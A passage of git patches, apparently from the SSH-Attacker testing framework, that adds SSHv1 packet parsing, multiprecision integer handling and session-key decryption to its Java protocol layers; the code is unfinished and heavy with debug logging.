a57914fc8..3d9a7d85a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -19,6 +19,8 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -30,14 +32,21 @@ import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHintSSHV1; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; +import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; +import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -158,6 +167,30 @@ public LayerProcessingResult receiveData() { } LOGGER.debug("[bro] Searching for Hint"); LayerProcessingHint tempHint = dataStream.getHint(); + + byte[] streamContent; + try { + LOGGER.debug("I could read {} bytes", dataStream.available()); + streamContent = dataStream.readChunk(dataStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + AbstractPacket packet; + + LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); + if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { + packet = new BinaryPacket(); + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { + packet = new BlobPacket(); + } else { + throw new RuntimeException(); + } + + packet.setPayload(streamContent); + + parseMessageFromID(packet, context); + /* if (tempHint == null) { LOGGER.warn( "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); @@ -166,7 +199,7 @@ public LayerProcessingResult receiveData() { PacketLayerHintSSHV1 hint = (PacketLayerHintSSHV1) dataStream.getHint(); LOGGER.debug("[bro] reading message for Hint {}", hint.getType()); readMessageForHint(hint); - } + }*/ // receive until the layer configuration is satisfied or no data is left } while (shouldContinueProcessing()); } catch (TimeoutException ex) { @@ -175,6 +208,85 @@ public LayerProcessingResult receiveData() { return getLayerResult(); } + public void parseMessageFromID(AbstractPacket packet, SshContext context) { + byte[] raw = packet.getPayload().getValue(); + if (packet instanceof BlobPacket) { + String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); + if (rawText.startsWith("SSH-")) { + readVersionExchangeProtocolData((BlobPacket) packet); + return; + } else { + final AsciiMessage message = new AsciiMessage(); + AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + + // If we know what the text message means we can print a + // human-readable warning to the log. The following + // messages are sent by OpenSSH. + final String messageText = message.getText().getValue(); + if ("Invalid SSH identification string.".equals(messageText)) { + LOGGER.warn( + "The server reported the identification string sent by the SSH-Attacker is invalid"); + } else if ("Exceeded MaxStartups".equals(messageText)) { + LOGGER.warn( + "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); + } + readASCIIData((BlobPacket) packet); + return; + } + } + + MessageIdConstantSSH1 id = + MessageIdConstantSSH1.fromId( + packet.getPayload().getValue()[0], context.getContext()); + + LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); + + switch (id) { + case SSH_MSG_DISCONNECT: + LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); + // return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_MSG_DISCONNECT); + break; + case SSH_SMSG_PUBLIC_KEY: + LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); + readPublicKeyData((BinaryPacket) packet); + break; + // return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_SMSG_PUBLIC_KEY); + case SSH_MSG_IGNORE: + LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); + break; + // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); + case SSH_MSG_DEBUG: + LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); + break; + // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); + break; + /*return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION);*/ + case SSH_MSG_CHANNEL_OPEN_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); + break; + // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); + case SSH_MSG_CHANNEL_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); + break; + // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); + case SSH_MSG_CHANNEL_CLOSE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); + break; + // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + default: + LOGGER.debug( + "[bro] cannot identifie {} as {} - returningn null", + raw[1], + MessageIdConstant.fromId( + packet.getPayload().getValue()[0], context.getContext())); + // return null; + } + } + private void readUnknownProtocolData() { UnknownMessage message = new UnknownMessage(); readDataContainer(message, context); @@ -184,19 +296,13 @@ private void readUnknownProtocolData() { public void readMessageForHint(PacketLayerHintSSHV1 hint) { switch (hint.getType()) { // use correct parser for the message - case ASCII_MESSAGE: - readASCIIData(); - break; - case VERSION_EXCHANGE_MESSAGE_SSH1: - readVersionExchangeProtocolData(); - break; case SSH_CMSG_AUTH_RHOSTS_RSA: // Read CMSG_AUTH_RHOSTS_RSA case SSH_MSG_DISCONNECT: // Handle SSH_MSG_DISCONNECT message break; case SSH_SMSG_PUBLIC_KEY: - readPublicKeyData(); + // readPublicKeyData(); break; case SSH_CMSG_SESSION_KEY: // Handle SSH_CMSG_SESSION_KEY message @@ -304,19 +410,38 @@ public void readMessageForHint(PacketLayerHintSSHV1 hint) { } } - private void readPublicKeyData() { + private void readPublicKeyData(AbstractPacket packet) { ServerPublicKeyMessage message = new ServerPublicKeyMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + // readDataContainer(message, context); } - private void readASCIIData() { + private void readASCIIData(AbstractPacket packet) { AsciiMessage message = new AsciiMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + // readDataContainer(message, context); } - private void readVersionExchangeProtocolData() { + private void readVersionExchangeProtocolData(AbstractPacket packet) { VersionExchangeMessageSSHV1 message = new VersionExchangeMessageSSHV1(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + + // readDataContainer(message, context); } /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 34ec3553d..ee9ff3ae3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -39,9 +39,6 @@ public abstract class AbstractPacket> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray payload; - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) - private ModifiableByteArray cleanProtocolMessageBytes; - public AbstractPacket() {} public ModifiableByteArray getCompletePacketBytes() { From 530f3476e0aa5c1fb970701225e7e4ab72ef590b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 26 Aug 2023 13:55:53 +0200 Subject: [PATCH 069/176] implementing CMSG_SESSION_KEY --- .../core/constants/KeyExchangeAlgorithm.java | 2 + .../core/crypto/cipher/CipherFactory.java | 2 + .../core/layer/context/SshContext.java | 29 ++- .../sshattacker/core/layer/data/Parser.java | 13 + .../core/layer/data/Serializer.java | 14 ++ .../core/layer/impl/PacketLayer.java | 31 ++- .../core/layer/impl/SSH1Layer.java | 17 ++ .../ClientSessionKeyMessageHandler.java | 184 ++++++++++++-- .../ServerPublicKeyMessageHandler.java | 3 + .../ssh1/message/ClientSessionKeyMessage.java | 24 ++ .../parser/ClientSessionKeyMessageParser.java | 46 +++- .../parser/ServerPublicKeyMessageParser.java | 1 - .../ClientSessionKeyMessagePreparator.java | 227 +++++++++++++++++- .../ServerPublicKeyMessagePreparator.java | 39 +++ .../ClientSessionKeyMessageSerializer.java | 48 +++- .../ServerPublicKeyMessageSerializer.java | 2 +- .../core/workflow/action/MessageAction.java | 6 +- .../core/workflow/action/ReceiveAction.java | 6 +- 18 files changed, 663 insertions(+), 31 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java index e658209b7..b331da81f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java @@ -83,6 +83,8 @@ public enum KeyExchangeAlgorithm { // [ RFC 4432 ] RSA1024_SHA1(KeyExchangeFlowType.RSA, "rsa1024-sha1", "SHA-1"), RSA2048_SHA256(KeyExchangeFlowType.RSA, "rsa2048-sha256", "SHA-256"), + + RSA1024_PCKS1(KeyExchangeFlowType.RSA, "rsa1024-pkcs1", "PKCS1"), // [ RFC 8308 ] EXT_INFO_S(null, "ext-info-s", null), EXT_INFO_C(null, "ext-info-c", null), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java index 24745dfa0..4ed7a060d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java @@ -52,6 +52,8 @@ public static AbstractCipher getOaepCipher(KeyExchangeAlgorithm keyExchangeAlgor case RSA2048_SHA256: return new OaepCipher( key, "RSA/ECB/OAEPWithSHA-256AndMGF1Padding", "SHA-256", "MGF1"); + case RSA1024_PCKS1: + return new OaepCipher(key, "RSA/ECB/PKCS1Padding", "SHA-1", "MGF1"); default: LOGGER.warn( "Cannot generate OAEP cipher for key exchange algorithm: '" diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index fa9e7971b..8f89aa954 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -221,7 +221,7 @@ public PacketCipher getActiveDecryptCipher() { private Integer maximalDhGroupSize; /** Host key */ private SshPublicKey hostKey; - + /** Server key for SSHv1 */ private SshPublicKey serverKey; /** Signature generated by the server over the exchange hash to authenticate the key exchange */ private byte[] serverExchangeHashSignature; @@ -248,6 +248,8 @@ public PacketCipher getActiveDecryptCipher() { private byte[] antiSpoofingCookie; + private byte[] sessionKey; + private List chosenProtocolFlags; private CipherMethod chosenCipherMethod; private AuthenticationMethodSSHv1 chosenAuthenticationMethod; @@ -1009,4 +1011,29 @@ public void setChosenAuthenticationMethod( AuthenticationMethodSSHv1 chosenAuthenticationMethod) { this.chosenAuthenticationMethod = chosenAuthenticationMethod; } + + public List getSupportedCipherMethods() { + return supportedCipherMethods; + } + + public void setSupportedCipherMethods(List supportedCipherMethods) { + this.supportedCipherMethods = supportedCipherMethods; + } + + public List getSupportedAuthenticationMethods() { + return supportedAuthenticationMethods; + } + + public void setSupportedAuthenticationMethods( + List supportedAuthenticationMethods) { + this.supportedAuthenticationMethods = supportedAuthenticationMethods; + } + + public byte[] getSessionKey() { + return sessionKey; + } + + public void setSessionKey(byte[] sessionKey) { + this.sessionKey = sessionKey; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java index 099ba701a..1c15232bd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java @@ -209,6 +209,19 @@ protected BigInteger parseMultiprecision() { return parseBigIntField(lenght); } + protected byte[] parseMultiprecisionAsByteArray() { + int lenght = parseIntField(2); + LOGGER.debug("[bro] got lenght before resize: {}", lenght); + int resize = 0; + if (lenght % 8 != 0) { + resize = 8 - lenght % 8; + } + + lenght = (lenght + resize) / 8; + LOGGER.debug("[bro] got lenght after resize: {}", lenght); + return parseByteArrayField(lenght); + } + /** * Returns the parsed object. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java index 8ad08b2b5..0ae0463c9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java @@ -105,6 +105,20 @@ public final void appendMultiPrecision(BigInteger i) { appendBytes(bytes); } + public final void appendMultiPrecisionAsByteArray(byte[] i) { + byte[] bytes; + int lenght = i.length * 8; + LOGGER.debug("MPI is {} Bit long", lenght); + bytes = ArrayConverter.intToBytes(lenght, 2); + appendBytes(bytes); + LOGGER.debug(" -> Appended Length {}", ArrayConverter.bytesToHexString(bytes)); + + bytes = i; + LOGGER.debug(" -> Appended MPI-Value {}", ArrayConverter.bytesToHexString(bytes)); + + appendBytes(bytes); + } + /** * Adds a byte to the final byte[]. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index f8adf42da..864610b1c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -37,6 +37,7 @@ import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; +import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.IOException; @@ -110,7 +111,13 @@ public LayerProcessingResult sendData(byte[] additionalData) if (context.getPacketLayerType() == PacketLayerType.BLOB) { packet = new BlobPacket(); } else { - packet = new BinaryPacket(); + if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { + LOGGER.debug("[bro] Created a Binary SSHv1 Packet"); + packet = new BinaryPacketSSHv1(); + } else { + LOGGER.debug("[bro] Created a Binary SSHv2 Packet"); + packet = new BinaryPacket(); + } } packet.setPayload(additionalData); @@ -143,12 +150,22 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { - parser = - new BinaryPacketParser( - dataStream, - context.getPacketLayer().getDecryptorCipher(), - context.getReadSequenceNumber()); - packet = new BinaryPacket(); + if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { + parser = + new BinaryPacketParserSSHv1( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacketSSHv1(); + } else { + parser = + new BinaryPacketParser( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacket(); + } + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { parser = new BlobPacketParser(dataStream); packet = new BlobPacket(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 3d9a7d85a..b9d14a908 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -18,6 +18,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.constants.PacketLayerType; @@ -38,6 +39,7 @@ import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.protocol.common.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; @@ -175,6 +177,7 @@ public LayerProcessingResult receiveData() { } catch (IOException e) { throw new RuntimeException(e); } + LOGGER.debug("STREAMCONTENT: {}", ArrayConverter.bytesToHexString(streamContent)); AbstractPacket packet; @@ -251,6 +254,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); readPublicKeyData((BinaryPacket) packet); break; + case SSH_CMSG_SESSION_KEY: + LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); + readSessionKeyData((BinaryPacket) packet); + break; // return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_SMSG_PUBLIC_KEY); case SSH_MSG_IGNORE: LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); @@ -293,6 +300,16 @@ private void readUnknownProtocolData() { getLowerLayer().removeDrainedInputStream(); } + private void readSessionKeyData(AbstractPacket packet) { + ClientSessionKeyMessage message = new ClientSessionKeyMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + public void readMessageForHint(PacketLayerHintSSHV1 hint) { switch (hint.getType()) { // use correct parser for the message diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 4caa7029f..1e8c2815e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -7,9 +7,24 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.handler; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; +import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.util.Arrays; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -28,21 +43,162 @@ public ClientSessionKeyMessageHandler(SshContext context) { @Override public void adjustContext(ClientSessionKeyMessage message) { + sshContext.setChosenCipherMethod(message.getChosenCipherMethod()); + sshContext.setChosenProtocolFlags(message.getChosenProtocolFlags()); + byte[] decryptedSessionkey = decryptSessionKey(message); - // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); - // setRemoteValues(message); - /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); - sshContext.setSharedSecret( - sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); - sshContext - .getExchangeHashInputHolder() - .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); - KeyExchangeUtil.computeExchangeHash(sshContext); - */ - /* KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message);*/ - /* - KeyExchangeUtil.setSessionId(sshContext); - KeyExchangeUtil.generateKeySet(sshContext);*/ + sshContext.setSessionKey(decryptedSessionkey); + + } + + private byte[] decryptSessionKey(ClientSessionKeyMessage message) { + byte[] sessionKey = message.getEncryptedSessioKey().getValue(); + LOGGER.debug("Enc. session Key: {}", ArrayConverter.bytesToHexString(sessionKey)); + if (sessionKey[0] == 0) { + sessionKey = Arrays.copyOfRange(sessionKey, 1, sessionKey.length); + } + + CustomRsaPublicKey hostPublickey; + CustomRsaPublicKey serverPublicKey; + + CustomRsaPrivateKey hostPrivateKey; + CustomRsaPrivateKey serverPrivatKey; + + SshPublicKey serverkey = sshContext.getServerKey(); + + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { + serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); + } else { + throw new RuntimeException(); + } + + SshPublicKey hostKey = sshContext.getHostKey().orElseThrow(); + if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { + hostPublickey = (CustomRsaPublicKey) hostKey.getPublicKey(); + } else { + throw new RuntimeException(); + } + + if (!serverkey.getPrivateKey().isPresent()) { + LOGGER.fatal("ServerPrivateKey not Present"); + } + + if (serverkey.getPrivateKey().isPresent() + && serverkey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { + serverPrivatKey = (CustomRsaPrivateKey) serverkey.getPrivateKey().get(); + } else { + throw new RuntimeException(); + } + + if (hostKey.getPrivateKey().isPresent() + && hostKey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { + hostPrivateKey = (CustomRsaPrivateKey) hostKey.getPrivateKey().get(); + } else { + throw new RuntimeException(); + } + + /*Sanity Check Area*/ + + Cipher myCipher = null; + try { + byte[] dummy = new byte[] {0, 1, 2, 3}; + byte[] enc_dummy; + byte[] dec_dummy; + myCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + myCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); + enc_dummy = myCipher.doFinal(dummy); + + myCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); + dec_dummy = myCipher.doFinal(enc_dummy); + + LOGGER.debug("DUMMY: {} ECN_DUMMY: {} DEC_DUMMY: {}", dummy, enc_dummy, dec_dummy); + + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } catch (NoSuchPaddingException e) { + throw new RuntimeException(e); + } catch (IllegalBlockSizeException e) { + throw new RuntimeException(e); + } catch (BadPaddingException e) { + throw new RuntimeException(e); + } catch (InvalidKeyException e) { + throw new RuntimeException(e); + } + + /*Sanity Check Area*/ + + AbstractCipher innerEncryption; + AbstractCipher outerEncryption; + + if (hostPublickey != null && serverPublicKey != null) { + try { + + if (hostPublickey.getModulus().bitLength() + > serverPublicKey.getModulus().bitLength()) { + + LOGGER.debug( + "Hostkeylenght: {}, ServerKeyLenght: {}", + hostPublickey.getModulus().bitLength(), + serverPublicKey.getModulus().bitLength()); + + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); + sessionKey = outerEncryption.decrypt(sessionKey); + + innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); + sessionKey = innerEncryption.decrypt(sessionKey); + + /* Alternative Imlementation */ + + /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + encryptCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); + sessionKey = encryptCipher.doFinal(sessionKey); + + encryptCipher.init(Cipher.DECRYPT_MODE, serverPrivatKey); + sessionKey = encryptCipher.doFinal(sessionKey);*/ + + /* Alternative Imlementation */ + + } else { + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); + sessionKey = outerEncryption.decrypt(sessionKey); + + innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); + sessionKey = innerEncryption.decrypt(sessionKey); + + /* Alternative Imlementation */ + + /* innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); + sessionKey = innerEncryption.encrypt(sessionKey); + + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); + sessionKey = outerEncryption.encrypt(sessionKey);*/ + + /* Alternative Imlementation */ + + } + + } catch (CryptoException e) { + LOGGER.fatal(e); + e.printStackTrace(); + throw new RuntimeException(e); + } + } + + // Set Sessionkey + LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); + return sessionKey; } /*private void setRemoteValues(ServerPublicKeyMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index c265610fc..609646632 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -56,6 +56,9 @@ public void adjustContext(ServerPublicKeyMessage message) { sshContext.setServerKey(message.getServerKey()); sshContext.setHostKey(message.getHostKey()); sshContext.setAntiSpoofingCookie(message.getAntiSpoofingCookie().getValue()); + sshContext.setSupportedCipherMethods(message.getSupportedCipherMethods()); + sshContext.setSupportedAuthenticationMethods(message.getSupportedAuthenticationMethods()); + sshContext.setChosenProtocolFlags(message.getChosenProtocolFlags()); // TODO: Choose correct CipherMethod // TODO: Choose correct AuthenticationMethod diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java index 94aa71e76..2d0bfe401 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -65,6 +65,12 @@ public void setEncryptedSessioKey(ModifiableByteArray encryptedSessioKey) { this.encryptedSessioKey = encryptedSessioKey; } + public void setEncryptedSessioKey(byte[] encryptedSessioKey) { + this.encryptedSessioKey = + ModifiableVariableFactory.safelySetValue( + this.encryptedSessioKey, encryptedSessioKey); + } + public ModifiableByteArray getPlaintextSessioKey() { return plaintextSessioKey; } @@ -89,6 +95,24 @@ public void setProtocolFlagMask(ModifiableInteger protocolFlagMask) { this.protocolFlagMask = protocolFlagMask; } + public void setProtocolFlagMask(int protocolFlagMask) { + this.protocolFlagMask = + ModifiableVariableFactory.safelySetValue(this.protocolFlagMask, protocolFlagMask); + } + + public ModifiableByteArray getSshv1SessionID() { + return 